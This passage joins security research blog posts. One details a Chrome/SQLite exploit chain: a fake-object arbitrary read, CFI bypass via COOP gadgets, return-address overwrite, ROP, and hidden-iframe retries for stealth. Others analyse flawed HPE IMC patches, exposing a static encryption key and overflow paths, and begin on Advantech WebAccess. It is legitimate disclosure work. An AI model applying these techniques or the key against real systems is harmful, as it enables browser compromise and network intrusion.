Like any other tree, it has a left and right node pointer, and it has certain flags and a pointer that points to the actual node data. Let’s see how a default value looks in memory.
(gdb) p *(Expr*)0x74b6c0
$26 = {
op = 143 '\217',
affinity = 0 '\000',
flags = 8438784,
u = {
zToken = 0x1337 <error: Cannot access memory at address 0x1337>,
iValue = 4919 }, }
This might seem a little complicated at first glance. The only thing important in the Expr object is the opcode, the flags, and the zToken. Here is how the above series of objects would look in a more graphical fashion.
Here is what we want to achieve, in order to gain AAR.
We would create a fake Expr object. The Expr object would represent a leaf node (EP_TokenOnly | EP_Leaf) so SQLite won’t go looking into the pLeft and pRight members, and the node will be set to a static node (EP_Static) so that SQLite won’t free the zToken member when it’s about to dispose the Expression tree. Then, the opcode will be set to OP_String, so that SQLite will treat the address that zToken points to as a NULL terminated string.
The next question is where are we going to write this fake Expr object?
This brings up the requirement issue that was presented on Stage 8. The reason why we wanted to have the three chunks in order is because we could assume that the column object array (the first chunk) is placed right before leaked second chunk. By having the objects laid out that way, writing arbitrary data that represents the fake Expr object, and retrieving the object’s address is instantly solved. This is depicted in the following pictures.
This explains why the precondition in Stage 8 was required. However, we should at least discuss how this requirement can be eliminated, because having the 3 chunks allocated sequentially is the least reliable part of the entire exploit, and it would be nice if there was a way to avoid it. In order to get rid of the requirement, the following steps can be taken.
On the beginning of Stage 8, allocate a bunch of 0x2000 chunks. Then deallocate one of the 0x2000 chunks in the middle.
Drop the table that holds the 0x1000 chunk, and allocate a column array with 104 column names. The corrupted column index will allocate a column name of size 0x2000. This will place the column object array back in it’s 0x1000 place, and place the 0x2000 column name into the hole that was created in step 1.
Execute Stage 8 to leak the lower 3 bytes of the 0x2000 chunk address.
Corrupt the column name address so that it points to the the next 0x2000 chunk.
Use the INSERT statement to find which table is responsible for that chunk.
Drop that table. Place the Fts3Table chunk there.
Corrupt the column name address so that it points to the 0x2000 chunk that’s after the Fts3Table.
Use the INSERT statement to find which table is responsible for that chunk.
Drop that table. Place a 0x2000 chunk with arbitrary data on there, that could be used for the fake Expr object.
Now we have 3 chunks allocated sequentially, and the address of all three chunks are known.
This is far more reliable and precise than the “Pray that the three 0x1000 chunks are next to each other” method. The only problem is to find a primitive which the user can allocate an arbitrary sized chunk with attacker controlled data. This can not be done with column names because of the UTF-8 conversion. How to find such primitive will be discussed in the end of the blog post, in the “Increasing Speed and Reliability” section.
Now back to the Expr objects. The final question is how the fake Default Value object could be used to read data from an arbitrary address. After all, only the default value has been set, and SQLite has no way to read the default value out of the table.
This is true and not true. It is impossible to issue a query to read the default value that was set by the CREATE TABLE statement. However, it is possible to indirectly read it. The logic behind it is simple.
We INSERT into the corrupted table a single value using an innocent column, and let SQLite write the default value of the corrupted column into the table. What SQLite does under the hood is, it goes through each column in the Column Object array and checks if any of the column objects have the Default Value Expression tree set. If it is 0, then SQLite fills that column’s data in the new row with NULL. If it actually sees some address, then it follows the expression tree and parses it. SQLite sees our fake Expr object, and it sees that it’s a leaf node. It looks at the column opcode and sees OP_STRING. Therefore, it treats the node value as a string address, and it grabs the NULL terminated string from the address, and uses that to fill the the new row’s column data. Since SQLite does all of this itself, there is no UTF-8 conversion involved, and the value is simply treated as a NULL terminated string, and copied as-is.
Later, we can SELECT that value from the table, and read it back out. Since the column type of the corrupted column is set to BLOB, sqlite will treat the underlying value as a series of hex bytes and return it to the user. For the user to actually see the data in it’s original form, the result data can be passed through the hex() or the quote() function, so that the hex bytes will be converted to a series of ascii characters that represent the hex data.
This is how an AAR is constructed. We indirectly read the data by INSERTing, and then SELECTing. Since the AAR can only read strings up to a NULL byte, all data is read one byte at a time, and the resulting bytes are all combined into an array where it can later be processed. Using this, it is possible to leak all data on the Fts3Table object, including the very first member. This bypasses ASLR. We are going to further abuse this AAR to read more interesting things.
Stage 11
Now the final problem is how to control $RIP.
The current situation is that AAR is achieved, but AAW isn’t. Therefore, in order to skip AAW, it would be desirable to find a code execution primitive in one of the objects that we can OOB write. In the current heap layout, the only object that has potentially interesting fields which lies in the boundaries of the OOB write is the third chunk, which is the Fts3Table object. Remember this?
That is the object we want to corrupt. We can start from the first chunk which is the topmost chunk in the above picture, OOB write while protecting the column array data all the way to the end of the first chunk, then all the way to the end of the second chunk, and start corrupting fields in the Fts3Table object. Now the question is if there is any interesting field that would lead to code execution.
After scavenging through the fts3 Virtual Table Methods, we came across this function.
/* Free any prepared statements held */
sqlite3_finalize(p->pSeekStmt); for(i=0; i<SizeofArray(p->aStmt); i++){
sqlite3_finalize(p->aStmt[i]); }
sqlite3_free(p->zSegmentsTbl);
sqlite3_free(p->zReadExprlist);
sqlite3_free(p->zWriteExprlist);
sqlite3_free(p->zContentTbl);
sqlite3_free(p->zLanguageid);
/* Invoke the tokenizer destructor to free the tokenizer. */ p->pTokenizer->pModule->xDestroy(p->pTokenizer);
sqlite3_free(p); return SQLITE_OK; }
The line of importance is highlighted. p->pTokenizer is a field within the Fts3Table object. It’s 0x48 offset away from the beginning. The function reads that field, dereferences it a couple times and uses the final value as a function pointer. This is a perfect code control primitive. In assembly, line 49 looks like this.
So what we’re trying to achieve looks like the following.
After finding the primitive, payload was constructed to control $RIP. This was built for the debug compile build of Chromium. After that, the exploit was ported to the vulnerable Chrome stable version (v70.0.3538.77). While porting it, a peculiar happened. $RIP would no longer be controlled, but would jump to a UD2 instruction instead. At first, it was thought that some kind of custom exception handler logic was in play and was snatching the SIGSEGV, but it turned out to be something else. We observed the program right before $RIP was controlled, and realized that the above assembly has changed, and had additional logic on the release build. It looked like the following.
This was obviously some kind of Control Flow Integrity logic. The program was checking if the call destination was in a certain range, and if it wasn’t, it would ruthlessly jump to UD2, terminating the process.
This was interesting, because there was no mention about CFI being enabled on Windows builds, so it was interesting to encounter a CFI implementation on Linux. In fact, there is actually a page in the Chromium website that explains about the CFI, and it states the CFI is currently only implemented in Linux and slated to be released on other platforms some time in the future. All of this is great but what this means for an exploiter is that the CFI would have to be bypassed.
The go-to way to bypass CFI is to achieve AAR/AAW before getting code execution, and work forwards from there. Right now, we only have AAR and no AAW. The first idea to achieve AAW was to manipulate the Expression trees representing the Default Value of a Column object. This is because during the course of experimenting with fake Expr objects, playing with various flags and values led to all kinds of interesting crashes. So conjuring an AAW by creating the right sequence of Expression nodes was one way to deal with it. However, this required another deep dive into how SQLite handles expression trees, and a scavenge through the source code of all of the opcodes, and the accompanying functions.
What we decided to use instead, were the artifacts lying right in front of us. The list of functions that the CFI allowed to call.
For CFI checks on other parts of the code, the function list that CFI permits is very narrow.
In this case, CFI only allows to jump to 8 functions that is predefined in a jump table.
However, in our case, we had a choice of 260 functions to jump to.
That is a lot of functions. With this big list of a function, we just might be able to find a function that matches a certain criteria, that would aid in exploitation. This kind of calling into functions that the CFI allows is called Counterfeit Object Oriented Programming (COOP). It’s actually a term coined by the academia, and is used to describe constructing turing complete ROP gadget sets using only functions that the CFI allows. In essence, it is a generic CFI bypass technique, provided there is a long enough list of functions to choose from. In the paper, they call each of the CFI compliant functions a vfgadget. We will use this term in the remainder of the blogpost, because it’s a short term that could abbreviate “CFI compliant function gadget”. In the paper, the goal is trying to create a turing complete set of vfgadgets, by finding various vfgadgets that serve different purposes. The most important of these gadgets would be the Main Loop Vfgadget. But for our purposes, it is not required to find all of these vfgadgets. We only need to find exactly 1, because AAR is already achieved. The reason for this will be explained in the following section.
There are actually 2 ways to abuse COOP. Both of them will be discussed in the following sections.
Bypassing CFI by gaining AAW
The first way to bypass CFI is to construct an AAW with one of the vfgadgets. What we looked for was a function of this type.
The goal was to call a vfgadget of the above form, and gain AAW. The function did not have to look exactly like the above listing, but anything that would lead to AAW would work. While scavenging through the list of vfgadgets, several functions were found that matched the criteria. However, most of the functions were of this form.
1 2 3 4 5 6 7 8 9 10 11 12
test_function(){
... // A looooooooooooot of things going on here.
...
Before and after our AAW primitive was triggered, there was an abundance of code executed. Because all code within the function uses the this pointer, which points to our ROP payload, there were so many reasons for the program to crash if care wasn’t taken to build a proper fake object that passed all the pointer dereferencing and conditional checks. Therefore, it was desirable to find a vfgadget that was a lot shorter, but still achieved the goal. After an hour of scavenging, we came across this vfgadget.
This is not actually a perfect vfgadget, but it serves our purpose perfectly, and is simple enough the deal with. What this vfgadget gives is an AAW primitive, because at the time of call, $RDI points to attacker controlled payload. By doing a bit of puzzle matching, it is possible to create an AAW primitive that writes a controlled QWORD into an address of our choosing.
Now this brings up the next question. Where are we going to overwrite?
Because the entire binary is compiled with CFI, any function pointer would not be a good choice. Actually, the go-to method for bypassing CFI after gaining AAW is going for the stack return address. This is not possible on recent mobile platforms (Hello PAC and soon to be born companion, Memory Tagging), but the desktop counterpart Intel CET has not arrived yet, so the stack still remains a perfect and the most easiest target.
This brings up the next problem of actually finding the stack. This is easy once AAR is achieved. The stack can be found by following a list of pointers, and the return address can be calculated from the leaked values. Our AAW target was the return address for the above vfgadget. Once the AAW is triggered, it would write an attacker controlled value into the return address which the vfgadget was originally supposed to return to. After the vfgadget is done executing, it would return to our stack pivot gadget, and kick start the ROP chain. To find that return address, it was required to find the WebSQL Database thread’s stack. In order to find that stack address, we first searched for Chrome’s Main Thread stack address. The Main Thread’s stack address is sprinkled on the main stack’s heap, which resides right behind the Chrome image executable in memory. Since this is the main thread’s heap, it is brk‘d and grows right behind the Chrome image.
It was found that certain stack addresses from the Main Chrome Thread lied in the same location in every run, even across reboots. The one with the lowest index was chosen, because that is probably the one that was allocated during the most earliest phases of Chrome execution, so it could be assumed to be allocated there deterministically across different runs. Even if that’s not the case, we can use the AAR and do a heuristic search dynamically in javascript.
Next, we searched for a WebSQL Stack address within the Main Stack.
The WebSQL stack index would change slightly in different runs. This was not a reliable way to leak the WebSQL stack. Perhaps the reason for this is that because on each different run, there are slight changes in chrome environments based on the saved data on disk, or maybe different data received from the Google servers upon each run would introduce a different sequence of functions to be run or maybe introduce an alloca with a different size, making the WebSQL data on the stack move around little bits at a time. However, there is another reliable way. We already have one of the main stack’s address leaked in the previous phase. This is probably an address of a stack variable that is used in a certain function’s stack frame. The thing is, if that function that emcompasses the leaked stack variable is somewhere way down in the stack, it would be relatively free of the stack variance that was described earlier. What this means is that for any other functions called further down in the stack frame, they will be called in a deterministic fashion, lowering the stack frame on each function call in a fixed amount deterministically. As it so happens, the distance between the leaked Main Stack variable and the WebSQL stack address residing on the Main Stack is constant, with a fixed distance of 0x1768. By subtracting 0x1768 from the first address leak, we get the location of the WebSQL stack address that we want to leak. This same concept applies to leak the address of our target return address on the WebSQL stack. Subtracting 0x9C0 from the second leaked value will yield the exact position of our target return address. Since we know the location of the return address, we can construct a COOP payload that will AAW a stack pivot gadget right on top of that address.
The entire process is illustrated below.
This is why we only need exactly one gadget to control $RIP. Because we can AAR our way to find the return address’s location within the stack. From here, it is just standard ROP to execve or system.
The Chrome executable is huge, being 130MB in size. This is because it is statically compiled to include every library excluding the standard ones into the Chrome executable. Therefore, there is no shortage of ROP gadgets to choose from. The only problem is that extracting the gadgets can take a very long time. On the first round of ROP gadget extraction, we weren’t able to find a suitable stack pivot gadget. This is because the ROP stack is littered with values from the AAW vfgadget, in order to make the AAW work properly. The stack pivot needs to dodge all of those values and pick up empty slots within the ROP stack. This led us to run the ROPgadget tool with –depth=20, which was running for 48 hours on a 130MB binary, inside a virtual machine. While we had ROPgadget running, we casually went through the remaining vfgadget list, in hope to find another relatively simple AAW vfgadget that does not litter the ROP stack too much. During that process, we found a completely different way to bypass the CFI.
Bypassing CFI by gaining direct code execution
It turns out that the statement “CFI is universally applied to all indirect function calls” is false. This was realized after discovering the following gadget.
It was awestrucking on the discovery of this vfgadget. It completely dodged the CFI, making a direct call to a virtual function voiding all checks. What is even more remarkable is that this gadget also provides $RDI and $RSI with a completely clean ROP stack to work with. It’s as if someone left it there with the intention of “Use THIS GADGET to bypass the CFI *wink* “. This vfgadget is clearly the winner of all vfgadgets. The Golden Vfgadget that bypasses CFI in one fatal blow. We give our sincere appreciation to whoever contributed to the making of this vfgadget.
All jokes aside, the only plausible reason to explain why this function was left out was because it operates on Tagged Pointers. It seems that the current CFI implementation baked in the compiler gets easily confused when doing direct arithmetic on pointer values. This is shown on line 8 in the above listing. Thanks to this vfgadget, we can use it to directly jump to the stack pivot gadget and ROP from there, entirely skipping AAW. In our exploit, the previous AAW method was used after finding the appropriate stack pivot gadget, but this one would have been much more preferable, had it been discovered earlier.
Making a Stealth Exploit by abusing Chrome’s Site Isolation
Chrome offers a mitigation called Site Isolation. Here is the description of Site Isolation, borrowed from the Chromium webpage.
Site Isolation has been enabled by default in Chrome 67 on Windows, Mac, Linux, and Chrome OS to help to mitigate attacks that are able to read otherwise inaccessible data within a process, such as speculative side-channel attack techniques like Spectre/Meltdown. Site Isolation reduces the amount of valuable cross-site information in a web page’s process, and thus helps limit what an attacker could access.
In addition, Site Isolation also offers more protection against a certain type of web browser security bug, called universal cross-site scripting (UXSS). Security bugs of this form would normally let an attacker bypass the Same Origin Policy within the renderer process, though they don’t give the attacker complete control over the process. Site Isolation can help protect sites even when some forms of these UXSS bugs occur.
There is additional work underway to let Site Isolation offer protection against even more severe security bugs, where a malicious web page gains complete control over its process (also known as “arbitrary code execution”). These protections are not yet fully in place.
To summarize, site isolation mitigates CPU side channel attacks, and protects against UXSS logic bugs. However, it does not protect against gaining UXSS after gaining remote code execution with a renderer bug. Site isolation is also interesting for another perspective, in an exploiter’s point of view. Here’s another quote borrowed from the site.
Site Isolation offers a second line of defense to make such attacks less likely to succeed. It ensures that pages from different websites are always put into different processes, each running in a sandbox that limits what the process is allowed to do. It will also make it possible to block the process from receiving certain types of sensitive data from other sites. As a result, a malicious website will find it more difficult to steal data from other sites, even if it can break some of the rules in its own process.
The important part is emphasized. What this means is that all frames that open a different site from the parent frame, are running in different processes. This can be observed with a little experimentation.
➜ site_isolation_test ps aux |grep chrome |grep-vgrep|wc-l 6
➜ site_isolation_test ps aux |grep chrome |grep-vgrep|wc-l 7
➜ site_isolation_test ps aux |grep chrome |grep-vgrep|wc-l 8
➜ site_isolation_test ps aux |grep chrome |grep-vgrep|wc-l 9
➜ site_isolation_test ps aux |grep chrome |grep-vgrep|wc-l 10
As more iframes from different sites are added, more processes pop up. This is interesting in an exploiting point of view. What happens if an iframe from a different process crashes?
It does not take down the parent window along with it. It just crashes the process containing the iframe. Does it work with multiple iframes?
Confirmed. What if the iframe is barely visible?
The parent frame lives, and there is no visible indication on the screen that the child iframes crashed.
What this provides to an exploiter is three things.
On every failed exploit attempt, a new iframe can be launched. This provides an exploit a retry attempt, practically an unlimited number of times.
If the iframe is vanishingly small, there is no indication on the screen of exploit failure. The ‘Aww Snap!’ will be contained within the invisible iframe.
Each iframe launches a new process, and all exploit activity will be contained within that process. Whatever busy activity happens in the parent frame will not affect the child frame.
These are great characteristics for an exploit. All of these factors will contribute in enhancing the reliability of an exploit, and make the exploit immune to failures.
For our exploit, since the exploit runs for a fair amount of time, we simulated a scenario where the victim was lured to play a game of Zelda, while the exploit is running in an iframe in the background. The developer console is opened in order to show the exploit working behind the scenes.
The exploit works on all Ubuntu versions, because all exploit primitives are based on the Chrome binary itself, and does not rely on any offsets from the system libraries. In order to actually pop the calculator, Chrome needs to be run with the –no-sandbox flag. Otherwise, the exploit needs to be packed with a reflective-elf payload that is armed with a sandbox escape to pop calculator.
The entire exploit code can be found on our github.
Increasing Speed and Reliability
We will first talk about reliability, because everything about it has been covered in the previous sections. In order to increase reliability, steps should be taken to find the sources of failures, and to fix them. The source of the unreliability has been discussed on each stage, and ways on how to avoid them. This obviously doesn’t cover all sources of failure. While fixing them one by one, new issues will appear and issues that were completely unexpected will also pop up and be added to the to-fix list. It would be wise to just fix the major sources of failures and leave the minor ones as is, until the reliability is increased to over 80%. Then, let the site isolation technique describe above handle the rest of the failures by retrying. That would be a good tradeoff for balancing between creating a good enough exploit, and time invested to increase reliability.
Now let’s talk about reducing the execution time of the exploit. The major source of delay is obviously the spraying phase. This has to be eliminated to increase speed. But spraying is an essential requirement for the exploit. How would it be possible to OOB write to a target object that is 2GB away from the source object, without spraying the heap? The answer to this is that, we preserve spraying, but instead, spray in an efficient way. How is this possible?
The results show that even if the program successfully allocated 4GB amount of memory, it only took a mere 1 milisecond to complete. This is because Linux uses an optimistic memory allocation strategy. The memory is allocated, but it is not actually backed by physical pages until some data is actually written to that piece of memory. More importantly, since only 0x200 bytes are written to the 4GB chunk, all time for writing data on the heap is saved, while still being able to allocate a huge chunk of heap. This enables a situation where you can spray the heap very quickly, without having to write actual data to it. This is a great primitive because our jumping over 2GB heap spray does not require to have actual data in it. It just needs to make space on the heap for the OOB write to jump over. All we need to do is find such primitive.
In the course of building the exploit, such primitive was not actively searched for. However, just by taking a shortglanceatthecommitlogs of SQLite, there is a wealth of heap spray candidates to choose from, and some of them could very well meet the conditions described above.
SQLite is not the only source of finding such primitives. Since the TCMalloc heap is shared by all threads and managed by the Central Cache, heap sprays occurring from any other thread can make a good candidate. Spraying in Thread 1, and then spraying in Thread 2 will make the chunks in Thread 2 be adjacent with the ones sprayed in Thread 1. There will be a very small gap of a couple of pages, but basically, they will be pretty close to each other. Therefore, any heap spray from any kind of functionality in Chrome, that is backed by malloc/new will make a good candidate. Usually, the best place to look for such heap sprays are things that parse complex formats. One of the prime candidates would be font, or media parsing functionality. Finding this new heap spray primitive which could place arbitrary data on the heap, would fill in the missing piece of the alternative exploitation strategy described in Stage 10.
Before ending the blogpost, let’s talk about how to embrace these new primitives, and build a new exploitation strategy.
The new primitives will be named P1 and P2 respectively. P1 is a primitive to create a heap chunk of any size, without having to fill the entire content. P2 is a primitive to create a heap chunk of any size, and the ability to fill the chunk with attacker controlled arbitrary content. In order the refine the exploit strategy, the fts3 root node that contains our OOB chunk for apple, needs to be refined.
staticint fts3SegReaderNext(
Fts3Table *p,
Fts3SegReader *pReader, int bIncr ){ int rc;/* Return code of various sub-routines */ char*pNext;/* Cursor variable */ int nPrefix;/* Number of bytes in term prefix */ int nSuffix;/* Number of bytes in term suffix */
The vulnerable function is also pasted above for reference.
Term 1 is the same. Term 2 has been updated to reallocate the apple chunk into a 2GB chunk. The check on line 21 will be (0x3FFFC000 + 1) > 0, which will make it enter the if clause and reallocate the chunk based on the calculation on line 22, which is slightly less than 2GB. Let’s say, 1.9GB. Afterwards, the memcpy will merely copy 1 byte “A” at the middle of the 1.9GB chunk. This strikes away all the memcpy time, while still being able to allocate a huge 1.9GB chunk. The vulnerability is not actually triggered just yet, and Term 2 just serves the purpose of relocating the 0x10 byte apple chunk into a 1.9GB chunk. Next, Term 3 is parsed and the bug is triggered the same way it was in the original exploitation strategy. But since (0x7FFFFFFF + 1) is a negative value, the check on line 21 is bypassed and it runs straight towards the memcpy. The memcpy will OOB write at an address that is 0x7FFFFFFF bytes away from the start of the 1.9GB chunk, the same way it did in the previous stages. The only difference is that the apple chunk is not in a 0xa00 chunk, but this time, it is in a 1.9GB chunk.
The new exploitation strategy will be like the following.
This is the new refined exploit strategy to increase speed. Since most of the heap spraying is done with P1, which is lightning fast and doesn’t actually fill in any heap data, the entire spraying and probing process until Stage 7 will probably be reduced down to less than 10 seconds. This will actually make the exploit practical, and deployable in the real world. We haven’t actually gone down this route due to time constraints, but we present it here in case anyone wants to play with the concept.
Also, another thing worth mentioning is that this tactic could have probably been used to exploit Chrome on Windows. This is because apple no longer lives in the Low Fragmentation Heap, but now lives in a seperate heap, allocated by NtAllocateVirtualMemory. This makes it possible to have the 1.9GB chunk allocated at a relatively fixed location (which moves around a little due to the guard page size), and not being subject to the randomization of the LFH. To eliminate even the slight randomization completely, the Variable Size Allocation subsegment would also make a good target to place apple in. It would have been interesting to see this bug actually being used to compromise Chrome during Pwn2Own.
Conclusion
Finally, in terms of reliable N-Day exploits for Chrome, there are much better bugs that could achieve speed and reliability, due to the bug characteristics. The prime candidate for such bugs are those that occur in the V8 JIT engine, such as _tsuro‘s excellent V8 bug in Math.expm1. Our N-Day feed provides in-depth analysis and exploits for other kinds of V8 JIT bugs. Exodus nDay subscription can be leveraged by Red Teams to gain a foothold in the enterprise during penetration tests even when critical details about public vulnerabilities have been obscured (like the Magellan bug) or when it simply does not exist.
This post highlights several mistakes in the patches released for vulnerabilities affecting various services of HPE Intelligent Management Center, with a focus on its native binaries.
Author: István Kurucsai
During our work on N-day vulnerabilities, we encounter many different issues with security patches that can leave users of the affected product at risk even if they keep their systems up-to-date. Some fixes don’t attempt to address the underlying vulnerability but apply trivial changes that break the provided proof-of-concept exploit. Examples include removing the specific path used to trigger the issue while leaving others available or adding a layer of encryption to the communication protocol to which the exploit could easily be adapted. Other times, new vulnerabilities are introduced as a result of the code changes or previously unreachable vulnerabilities become exposed. Sometimes the fix is simply incorrect, e.g. it adds a new check for the wrong function call or with the wrong boundary conditions. There are cases where the original analysis of the vulnerability by the security researcher is incomplete, therefore the fixes and detection filters based on it are likely to be incomplete, too. And then there are the patches that don’t actually contain any relevant changes and the vulnerability remains exploitable while the issue is marked as resolved.
HPE Intelligent Management Center is a network management platform with a history of a wide range of vulnerabilities affecting it. It has a vast attack-surface, including web based components and native binaries implementing custom protocols. While the analysis was done on the Linux releases of IMC, it is important to note that the Windows and Linux versions are compiled from the same code base and share the same vulnerabilities.
Hiding Vulnerabilities
A common mistake we encounter during our day-to-day work is when a patch only removes a possible path for triggering the vulnerability instead of actually fixing the issue. A prime example of this is the attempts made at patching several issues affecting the dbman service, which is responsible for the backup and restoration of the databases used by IMC. The Linux version doesn’t have stack cookies and isn’t compiled as PIE. It listens on TCP port 2810 and expects a simple packet header consisting of an opcode and the data length, followed by a DER encoded ASN.1 message. Several vulnerabilities affecting it, including command injections, an arbitrary file write and a stack buffer overflow were published by ZDI in 2017 under the identifiers ZDI-17-336 through ZDI-17-343 and ZDI-17-481 through ZDI-17-484. These are quite similar in nature and close to each other in the code base. Let’s take a quick look at ZDI-17-336/CVE-2017-5820, titled Hewlett Packard Enterprise Intelligent Management Center dbman Opcode 10004 Command Injection Remote Code Execution Vulnerability.
Without going into too much detail, opcode 10004 corresponds to the BackupZipFile operation of dbman. After parsing the packet header and the ASN.1 message, control flow ends up in the CDbBackup::BackupOneLocalZipFile method, which constructs a command line that includes unescaped data from several message fields. This command line is then passed to the runCommand function, which is a wrapper around system, resulting in a command injection vulnerability. For the code snippet below, note that OneZipFileBackupObj is the parsed, unsanitized message from the packet.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
SNACC::AsnRet*__userpurge CDbBackup::BackupOneLocalZipFile@(SNACC::AsnRet*retstr, const CDbBackup *constthis, SNACC::AsnOneZipFileBackupPara*const OneZipFileBackupObj, int ifHost){
In the HPE Security Bulletin corresponding to ZDI-17-336/ CVE-2017-5820, the first patched version is indicated as IMC PLAT 7.3 E0504P04. Looking at the supposedly patched 7.3 E0506 version, the CDbBackup::BackupOneLocalZipFile function seems identical, containing the same vulnerability. Examining its caller, BackupZipFile, the only difference is that a new function, dbman_decode_len, is invoked before the ASN.1 decoding. It’s a rather short method, decrypting the input using DES in ECB mode with a static key, which is liuan814 in version 7.3 E0506.
Examining the call sites for dbman_decode_len, they correspond to the opcodes implicated in the published vulnerabilities, meaning that this is the supposed fix for the issues. While this breaks exploits developed for previous versions of IMC, it’s in no way a proper patch. Simply encrypting the message with the static key enables exploitation of the original vulnerabilities.
The Second Fix
Looking at the newest version (7.3 E0605H05), the vulnerabilities are still present, unpatched. However, the encryption scheme was altered. dbman_decode_len became a simple wrapper around decryptMsg, which reads in keying material from two files in the IMC installation directory, common\conf\ks.dat and server\conf\imchw.conf. This is then used to derive a 256-bit IV and encryption key. These are passed into decryptMsgAes, along with the incoming data from the message, which decrypts it using AES_256_CBC and processing of the message continues as before.
The contents of the ks.dat and imchw.conf are randomly generated upon install or update of the product, therefore interacting with the handlers of the vulnerable message types is impossible without having access to those files. However, IMC has a significant attack-surface and any file read or write vulnerability can be turned into a command injection by leaking or overwriting the key files and triggering the original vulnerabilities. It should also be noted that both schemes are only applied to opcodes in which vulnerabilities were reported, other opcodes remain reachable as before.
New Vulnerability Introduced In The Second Fix
Looking at the decryptMsgAes function, it can be seen that a new vulnerability was introduced that results in a stack buffer overflow. For the code snippet below, note that src is the message read from the network, iEncLen is its length and strDecrypt is a heap allocated buffer in which the decrypted message is passed back to the caller. While there are no meaningful limits on the length of the input message, the code assumes that when decrypted, it fits into 4096 bytes. EVP_DecryptUpdate is part of the OpenSSL library and its documentation states that
the decrypted data buffer out passed to EVP_DecryptUpdate() should have sufficient room for (inl + cipher_block_size) bytes
The variable iEncLen corresponds to inl from the above quote. Since the input can be larger than 4096 bytes, a stack-based buffer overflow can be triggered on line 16 of the snippet below. There’s also the possibility for a heap buffer overflow on lines 20-21 but EVP_DecryptFinal will fail on incorrect padding and it’s impossible to create valid padding without knowing the IV and key. Even though the overflow contents cannot be controlled without knowing the AES key and IV, when combined with a file read or write vulnerability to leak or change the keying material, this issue could be turned into a reliable exploit.
This vulnerability remains unpatched for the time being.
Failed Patches
It’s not uncommon for us to see patches that attempt to solve the root cause of an issue but fail to do so.
Stack Buffer Overflow In tftpserver
The IMC suite includes a TFTP server, implemented by the tftpserver service, which is used to distribute configuration files for devices. The TFTP protocol supports setting the blksize option on a connection, which allows the client and server to negotiate a blocksize more applicable to the network medium. This option is also supported by tftpserver and can be set by a client to an arbitrary 4-byte value as can be seen on the code snippet from the 7.3 E0506 version shown below.
Later on, this value is used to determine not only the block size for the network transmission but also for the file read and write operations. In the TFTP::handleRRQ function, which is responsible for the handling of RRQs (file read requests by the client), the contents of the requested file are read in blksize sized chunks into a fixed size stack buffer of 10000 bytes, as shown below.
The TFTP::getFileData function reads in the requested number of bytes into the stack buffer using fread (code below). Since m_pkg_LimitSize is attacker-controlled, this results in a stack buffer overflow, exploitable by first uploading the payload file to the server using a write request, then setting the blksize option to a value larger than 10000 and requesting the same file via a read request.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
int __cdecl TFTP::getFileData(TFTP *constthis,constchar*filename,int pos,int size,char*buf) {
HPE released a bulletin for the vulnerability, which states that it is fixed in version 7.3 E0605P04. Examining the updated tftpserver binary, the only relevant change seems to be in the TFTP::getFileData function, in which a check was added to ensure that the size variable passed in is below 65536 (0x10000), as shown on the following code extract.
} } } else {
v5 =-1;
XLOG::LogError(-1,"[TFTP::getFileData] Data is too large, more than 64k."); } return v5; }
There are multiple issues with this. As established previously, the buf argument points to a stack buffer that is 10000 bytes in size, so the check still allows an overflow of more than 50Kb. Besides that, the size argument is a signed integer and the blksize is also stored in a signed integer with an arbitrary value, meaning that negative values would also pass the check.
The latest version of IMC, v7.3 (E0605H05), was released on 08-Oct-2018 and still contains this incorrect fix.
The LogMsg Stack Buffer Overflows
An issue that took two iterations to patch properly is the vulnerability in the LogMsg method of the dbman service. The code of the function from version 7.3 E0504 can be seen below. As the name suggests, it’s used to log diagnostic messages. Accordingly, it has around 500 call-sites, many with arbitrarily long attacker-controlled data in the message, which can all result in a stack buffer overflow on line 10.
The vulnerability was patched in version 7.3 E0504P04, according to the HPE security bulletin. The fixed code is shown below and looks OK from a cursory glance, the length of the data written is limited by the use of the vsnprintf function.
However, the Msg buffer is then passed to the LogMsg_P function, which writes the data to the appropriate log file. It suffers from the same vulnerability as LogMsg. Even though the destination buffer on line 13 below is 8192 bytes long and the length of Msg is limited to 8192 bytes by the patch, there are up to a hundred bytes prepended to the actual message, so that the sprintf call can still write out-of-bounds. What is interesting is that triggering the original vulnerability is impossible without also triggering the one in LogMsg_P, meaning that the change probably wasn’t tested at all.
1 2 3 4 5 6 7 8 9 10 11 12 13
int __cdecl LogMsg_P(int Level,char*FuncName,char*Msg) {
The second attempt replaced the sprintf call in LogMsg_P with an appropriately sized snprintf, actually fixing the issue. During the six-month period between the release of the two bulletins, IMC installations remained vulnerable to a supposedly patched vulnerability.
Conclusion
The N-day feed of Exodus provides detailed analysis of publicly disclosed security issues. These include many similar cases, where a vulnerability continues to pose a threat even after applying the vendor-supplied patch. It enables our customers to assess the real risks associated with vulnerabilities and implement proper detection and defensive measures. With our rigorously tested exploit code (supplied as part of the feed), organizations no longer need to rely on minimal proof of concepts that are usually available publicly. Our offerings can be leveraged by Red Teams to gain a foothold in the enterprise during penetration tests even when public exploit code does not exist or is simply unreliable.
During our day-to-day research of N-day vulnerabilities at Exodus, we often come across public advisories containing incorrect root cause analysis of the core vulnerability. This blogpost details one such vulnerability in Advantech WebAccess which is a software suite used for managing SCADA environments. Although the vulnerability in question had been analyzed numerous times by multiple researchers, we discovered that every advisory and public exploit incorrectly denoted “directory traversal” as a factor. Therefore, if anyone tried to implement detection guidance for the vulnerability based solely on the public advisory, that detection would be deemed ineffective as it would likely involve scanning for path traversal characters which aren’t even required to exploit the vulnerability.
Additionally, this vulnerability (and several others within Advantech WebAccess) can be reached via multiple paths, a fact which we believe hasn’t been widely addressed by other blogposts/exploits.
Improper Root Cause Analysis
The vulnerability in 0x2711 IOCTL which is reachable over an RPC service had been disclosed twice by the ZDI as ZDI-18-024 and ZDI-18-483 and each time the vulnerability was described as a “directory traversal” vulnerability. It was also claimed to be patched by the vendor in both advisories until Tenable published a blogpost about it being still unpatched.
While the blogpost correctly mentioned that the lpApplicationName was set to NULL and that an attacker controlled string could be eventually passed to the CreateProcessA API as the lpCommandLine parameter, it was surprising to note the use of path traversal characters in the PoC code, given the fact that directory traversal isn’t even required to execute binaries located outside the application’s directory.
Referring to Microsoft’s documentation of the CreateProcessA API, one can observe the following:
